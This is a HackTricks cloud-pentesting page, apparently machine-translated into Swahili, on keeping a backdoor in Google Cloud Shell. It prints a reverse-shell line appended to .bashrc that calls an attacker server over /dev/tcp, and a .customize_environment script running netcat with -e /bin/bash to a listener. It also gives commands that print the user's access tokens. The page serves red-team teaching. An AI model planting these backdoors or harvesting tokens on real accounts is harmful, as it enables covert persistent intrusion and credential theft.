GCP - Cloud Shell Persistence

Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

Ikiwa unataka kuona kampuni yako ikitangazwa kwenye HackTricks au kupakua HackTricks kwa PDF Angalia MIPANGO YA KUJIUNGA!
Pata bidhaa rasmi za PEASS & HackTricks
Gundua Familia ya PEASS, mkusanyiko wetu wa NFTs za kipekee
Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud
repos za github.

Cloud Shell

Kwa habari zaidi angalia:

Mlango wa Nyuma wa Kudumu

Google Cloud Shell inakupa ufikiaji wa amri kwa rasilimali zako za wingu moja kwa moja kutoka kwenye kivinjari chako bila gharama yoyote inayohusiana.

Unaweza kupata Cloud Shell ya Google kutoka kwenye konsoli ya wavuti au kwa kukimbia gcloud cloud-shell ssh.

Konsoli hii ina uwezo wa kuvutia kwa wadukuzi:

Mtumiaji yeyote wa Google mwenye ufikiaji wa Google Cloud ana ufikiaji wa kipengele cha Cloud Shell kilichothibitishwa kabisa (Akaunti za Huduma zinaweza, hata ikiwa ni Wamiliki wa shirika).
Kipengele hicho kitabaki na directory yake ya nyumbani kwa angalau siku 120 ikiwa hakuna shughuli inayotokea.
Hakuna uwezo wa shirika kufuatilia shughuli ya kipengele hicho.

Hii kimsingi inamaanisha kwamba mshambuliaji anaweza kuweka mlango wa nyuma kwenye directory ya nyumbani ya mtumiaji na muda mrefu kama mtumiaji anajiunganisha kwenye GC Shell kila baada ya siku 120 angalau, mlango wa nyuma utaendelea kuwepo na mshambuliaji atapata kikao kila wakati unapoendeshwa tu kwa kufanya:

echo '(nohup /usr/bin/env -i /bin/bash 2>/dev/null -norc -noprofile >& /dev/tcp/'$CCSERVER'/443 0>&1 &)' >> $HOME/.bashrc

Kuna faili lingine katika folda ya nyumbani inayoitwa .customize_environment ambayo, ikiwepo, itatekelezwa kila wakati mtumiaji anapopata upatikanaji wa cloud shell (kama katika mbinu iliyopita). Ingiza mlango wa nyuma uliopita au moja kama ifuatavyo ili kudumisha uthabiti muda mrefu mtumiaji anapotumia "mara kwa mara" cloud shell:

#!/bin/sh
apt-get install netcat -y
nc <LISTENER-ADDR> 443 -e /bin/bash

Ni muhimu kutambua kwamba wakati wa kwanza kitendo kinachohitaji uthibitisho kinatekelezwa, dirisha la idhini linatokea kwenye kivinjari cha mtumiaji. Dirisha hili lazima lipokelewe kabla ya amri kuendesha. Ikiwa dirisha lisilotarajiwa litatokea, linaweza kuzua shaka na kuhatarisha njia ya uthabiti inayotumiwa.

Hii ni dirisha la idhini kutoka kwa kutekeleza gcloud projects list kutoka kwa ganda la wingu (kama mshambuliaji) inayoonekana kwenye kikao cha mtumiaji wa kivinjari:

Walakini, ikiwa mtumiaji ameitumia ganda la wingu kikamilifu, dirisha la idhini halitatokea na unaweza kukusanya vibali vya mtumiaji na:

gcloud auth print-access-token
gcloud auth application-default print-access-token

Jinsi uhusiano wa SSH unavyoundwa

Kimsingi, maombi haya 3 ya API hutumiwa:

https://content-cloudshell.googleapis.com/v1/users/me/environments/default:addPublicKey [POST] (itakufanya uongeze funguo yako ya umma uliyounda kwa kienyeji)
https://content-cloudshell.googleapis.com/v1/users/me/environments/default:start [POST] (itakufanya uanzishe kipengee)
https://content-cloudshell.googleapis.com/v1/users/me/environments/default [GET] (itakwambia anwani ya IP ya ganda la Google Cloud)

Lakini unaweza kupata habari zaidi katika https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key

Marejeo

PreviousGCP - Cloud Run Persistence NextGCP - Cloud SQL Persistence

Last updated 1 month ago